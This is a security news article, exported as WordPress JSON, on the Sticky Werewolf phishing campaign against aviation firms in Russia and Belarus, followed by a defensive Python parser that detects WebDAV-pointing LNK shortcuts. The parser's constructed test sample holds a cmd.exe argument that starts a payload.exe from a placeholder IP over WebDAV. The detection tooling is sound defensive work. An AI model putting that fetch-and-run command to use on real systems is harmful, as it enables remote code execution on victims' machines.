{"id":164345,"date":"2024-06-10T10:18:33","date_gmt":"2024-06-10T10:18:33","guid":{"rendered":"https:\/\/securityaffairs.com\/?p=164345"},"modified":"2024-06-10T10:18:34","modified_gmt":"2024-06-10T10:18:34","slug":"sticky-werewolf-targets-aviation-industry","status":"publish","type":"post","link":"https:\/\/securityaffairs.com\/164345\/hacking\/sticky-werewolf-targets-aviation-industry.html","title":{"rendered":"Sticky Werewolf targets the aviation industry in Russia and Belarus"},"content":{"rendered":"
<\/div>\n
Morphisec researchers observed a threat actor, tracked as Sticky Werewolf, targeting entities in Russia and Belarus.<\/h2>\n\n\n\n
Sticky Werewolf is a threat actor that was first spotted in April 2023, initially targeting public organizations in Russia and Belarus. The group has expanded its operations to various sectors, including a pharmaceutical company and a Russian research institute specializing in microbiology and vaccine development.<\/p>\n\n\n\n
In their latest campaign, Sticky Werewolf targeted the aviation industry with emails supposedly from the First Deputy General Director of AO OKB Kristall, a Moscow-based company involved in aircraft and spacecraft production and maintenance. Previously, the group used phishing emails with links to malicious files. In the latest campaign, the threat actor used archive files containing LNK files that pointed to a payload stored on WebDAV servers.<\/p>\n\n\n\n
Opening the LNK executes the binary hosted on the WebDAV server, which launches an obfuscated Windows batch script. The batch script in turn runs an AutoIt script that ultimately injects the final payload.<\/p>\n\n\n\n
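The delivery chain above (archive with an LNK whose target or arguments point at a WebDAV-hosted binary) can be triaged offline by parsing the shortcut and looking for WebDAV-specific UNC syntax. The following is an added example written for this article, not code from Morphisec or from the campaign: it implements a minimal MS-SHLLINK parser (header, optional IDList and LinkInfo skipped by their size fields, then the StringData fields) and flags any UNC path that uses the host@SSL / host@port form or the DavWWWRoot component, both of which force Windows to use the WebClient redirector rather than SMB. The sample shortcuts, the 203.0.113.5 address and the file names are constructed for the example and do not come from the reported campaign.

```python
import re
import struct
import sys
from dataclasses import dataclass, field

# ShellLinkHeader constants (MS-SHLLINK section 2.1).
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK section 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields, in the order they appear in the file (section 2.4).
STRING_DATA_FIELDS = (
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
)

# Any UNC-looking token; keep only those with WebDAV-specific syntax: a host@SSL /
# host@<port> suffix, or the DavWWWRoot component that forces the WebClient redirector.
# A plain \\host\share could be SMB or WebDAV, so it is deliberately not flagged here.
UNC_TOKEN = re.compile(r"\\\\[^\s\"']+")
WEBDAV_UNC = re.compile(r"^\\\\[^\\]+@(?:ssl|\d{1,5})\\|^\\\\[^\\]+\\davwwwroot(?:\\|$)", re.I)


@dataclass
class LnkSummary:
    flags: int
    strings: dict = field(default_factory=dict)
    webdav_refs: list = field(default_factory=list)


def _printable_strings(data: bytes):
    """Yield UTF-16LE and ASCII runs so paths buried in LinkInfo/ExtraData are seen too."""
    for m in re.finditer(rb"(?:[\x20-\x7e]\x00){6,}", data):
        yield m.group().decode("utf-16-le")
    for m in re.finditer(rb"[\x20-\x7e]{6,}", data):
        yield m.group().decode("ascii")


def parse_lnk(data: bytes) -> LnkSummary:
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a ShellLink: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    summary = LnkSummary(flags=flags)
    offset = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (u16) followed by the IDList
        offset += 2 + struct.unpack_from("<H", data, offset)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize (u32) counts itself
        offset += struct.unpack_from("<I", data, offset)[0]
    unicode = bool(flags & IS_UNICODE)
    for name, bit in STRING_DATA_FIELDS:      # each: CountCharacters (u16) + chars
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, offset)[0]
        offset += 2
        nbytes = count * 2 if unicode else count
        raw = data[offset:offset + nbytes]
        offset += nbytes
        summary.strings[name] = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    candidates = list(summary.strings.values()) + list(_printable_strings(data))
    refs = {tok for text in candidates for tok in UNC_TOKEN.findall(text) if WEBDAV_UNC.search(tok)}
    summary.webdav_refs = sorted(refs)
    return summary


def is_webdav_lure(summary: LnkSummary) -> bool:
    return bool(summary.webdav_refs)


def build_lnk(relative_path: str, arguments: str, name: str = "Document") -> bytes:
    """Construct a minimal Unicode .lnk (sample data for this example, not a real campaign file)."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_NAME | HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"   # empty IDList: just the TerminalID

    def string_data(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + id_list + string_data(name) + string_data(relative_path) + string_data(arguments)


# Constructed samples: one shortcut makes cmd.exe start a binary on a WebDAV server over
# port 80 (the pattern described in the article), the other is an ordinary local shortcut.
SAMPLE_WEBDAV_LNK = build_lnk(r"..\..\..\Windows\System32\cmd.exe",
                              r'/c start "" "\\203.0.113.5@80\DavWWWRoot\update\payload.exe"')
SAMPLE_BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", r"C:\Users\Public\notes.txt")

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_WEBDAV_LNK
    s = parse_lnk(data)
    print("strings:", s.strings)
    print("webdav refs:", s.webdav_refs, "-> suspicious:", is_webdav_lure(s))
```

Run it with a path to an extracted .lnk to triage a real attachment; with no argument it parses the constructed sample. The raw-string scan is there because a shortcut can carry the network path in the LinkInfo CommonNetworkRelativeLink or in ExtraData rather than in the arguments, and the parser above only decodes StringData. Treat a hit as a reason to pull the WebDAV host from proxy or WebClient service logs, not as proof of compromise on its own.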